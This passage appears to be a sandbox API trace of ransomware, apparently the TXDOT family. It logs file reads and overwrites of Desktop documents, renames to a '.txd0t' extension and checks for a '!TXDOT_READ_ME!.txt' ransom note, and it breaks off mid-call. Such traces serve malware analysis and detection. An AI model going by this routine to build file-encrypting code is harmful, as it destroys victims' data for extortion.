StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" [0073.771] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi") returned="I0Kapz95f.avi" [0073.771] StrCpyW (in: psz1=0xe9d794, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.771] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.772] GetProcessHeap () returned 0xe30000 [0073.772] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.772] CloseHandle (hObject=0x46c) returned 1 [0073.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\i0kapz95f.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\i0kapz95f.avi.txd0t")) returned 1 [0073.775] SetEvent (hEvent=0x414) returned 1 [0073.775] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.779] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" [0073.779] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t" [0073.779] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t") returned 0 [0073.779] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt", dwFileAttributes=0x80) returned 1 [0073.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\r1pzcjuzfthxdk9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.779] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=8078) returned 1 [0073.779] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.779] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.780] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffde72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.780] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x1f80, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x1f80, lpOverlapped=0x0) returned 1 [0073.780] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe080, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.780] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x1f80, lpOverlapped=0x0) returned 1 [0073.781] FlushFileBuffers (hFile=0x468) returned 1 [0073.787] GetProcessHeap () returned 0xe30000 [0073.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1208 [0073.787] StrCpyW (in: psz1=0xed1208, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" [0073.787] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt") returned="R1PzCjuzfThXdK9.ppt" [0073.787] StrCpyW (in: psz1=0xed124c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.788] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.788] GetProcessHeap () returned 0xe30000 [0073.788] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1208 | out: hHeap=0xe30000) returned 1 [0073.788] CloseHandle (hObject=0x468) returned 1 [0073.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\r1pzcjuzfthxdk9.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\r1pzcjuzfthxdk9.ppt.txd0t")) returned 1 [0073.789] SetEvent (hEvent=0x414) returned 1 [0073.789] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.792] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" [0073.792] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t" [0073.792] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t") returned 0 [0073.792] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif", dwFileAttributes=0x80) returned 1 [0073.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\x24_b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.793] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=37189) returned 1 [0073.793] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.793] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.794] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff6cbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.794] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x9140, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x9140, lpOverlapped=0x0) returned 1 [0073.794] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff6ec0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.795] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x9140, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x9140, lpOverlapped=0x0) returned 1 [0073.795] FlushFileBuffers (hFile=0x468) returned 1 [0073.800] GetProcessHeap () returned 0xe30000 [0073.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfe) returned 0xecf498 [0073.800] StrCpyW (in: psz1=0xecf498, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" [0073.801] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif") returned="X24_B.gif" [0073.801] StrCpyW (in: psz1=0xecf4dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.801] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.801] GetProcessHeap () returned 0xe30000 [0073.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf498 | out: hHeap=0xe30000) returned 1 [0073.801] CloseHandle (hObject=0x468) returned 1 [0073.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\x24_b.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\x24_b.gif.txd0t")) returned 1 [0073.803] SetEvent (hEvent=0x414) returned 1 [0073.803] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.808] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" [0073.809] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t" [0073.809] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t") returned 0 [0073.809] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf", dwFileAttributes=0x80) returned 1 [0073.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ygjz.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.809] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=23752) returned 1 [0073.809] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.809] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.810] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffa138, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.810] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x5cc0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x5cc0, lpOverlapped=0x0) returned 1 [0073.811] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffa340, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.811] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x5cc0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x5cc0, lpOverlapped=0x0) returned 1 [0073.811] FlushFileBuffers (hFile=0x46c) returned 1 [0073.817] GetProcessHeap () returned 0xe30000 [0073.817] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf7b0 [0073.817] StrCpyW (in: psz1=0xecf7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" [0073.817] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf") returned="yGjZ.rtf" [0073.818] StrCpyW (in: psz1=0xecf7f4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.818] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.818] GetProcessHeap () returned 0xe30000 [0073.818] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf7b0 | out: hHeap=0xe30000) returned 1 [0073.818] CloseHandle (hObject=0x46c) returned 1 [0073.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ygjz.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ygjz.rtf.txd0t")) returned 1 [0073.819] SetEvent (hEvent=0x414) returned 1 [0073.819] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.826] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" [0073.826] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t" [0073.826] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned 0 [0073.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a", dwFileAttributes=0x80) returned 1 [0073.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\tcy_wfmfoamzcgvnzfed.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.827] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=76652) returned 1 [0073.827] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.827] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.827] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffed294, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.827] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x12b60, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x12b60, lpOverlapped=0x0) returned 1 [0073.829] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffed4a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.829] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x12b60, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x12b60, lpOverlapped=0x0) returned 1 [0073.829] FlushFileBuffers (hFile=0x47c) returned 1 [0073.841] GetProcessHeap () returned 0xe30000 [0073.841] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2d00 [0073.841] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" [0073.841] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a") returned="tCY_wfmFOaMzCGVNZFEd.m4a" [0073.841] StrCpyW (in: psz1=0xed2d38, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.842] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.842] GetProcessHeap () returned 0xe30000 [0073.842] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0073.842] CloseHandle (hObject=0x47c) returned 1 [0073.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\tcy_wfmfoamzcgvnzfed.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\tcy_wfmfoamzcgvnzfed.m4a.txd0t")) returned 1 [0073.844] SetEvent (hEvent=0x414) returned 1 [0073.844] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.855] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" [0073.855] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t" [0073.855] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t") returned 0 [0073.855] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods", dwFileAttributes=0x80) returned 1 [0073.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\tpwq0w7bdvw50srvurb.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.856] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=39596) returned 1 [0073.856] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.856] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.857] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff6354, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.857] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x9aa0, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x9aa0, lpOverlapped=0x0) returned 1 [0073.858] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff6560, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.858] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x9aa0, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x9aa0, lpOverlapped=0x0) returned 1 [0073.858] FlushFileBuffers (hFile=0x46c) returned 1 [0073.866] GetProcessHeap () returned 0xe30000 [0073.866] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed28a0 [0073.866] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" [0073.867] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods") returned="tpWq0W7bdVW50sRvURB.ods" [0073.867] StrCpyW (in: psz1=0xed28d8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.867] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.867] GetProcessHeap () returned 0xe30000 [0073.867] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0073.867] CloseHandle (hObject=0x46c) returned 1 [0073.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\tpwq0w7bdvw50srvurb.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\tpwq0w7bdvw50srvurb.ods.txd0t")) returned 1 [0073.869] SetEvent (hEvent=0x414) returned 1 [0073.869] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.875] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" [0073.875] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t" [0073.875] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t") returned 0 [0073.876] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif", dwFileAttributes=0x80) returned 1 [0073.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\vn oo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.876] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=14293) returned 1 [0073.876] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.876] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.876] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffc62b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.876] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x37d0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x37d0, lpOverlapped=0x0) returned 1 [0073.877] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffc830, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.877] WriteFile (in: hFile=0x47c, 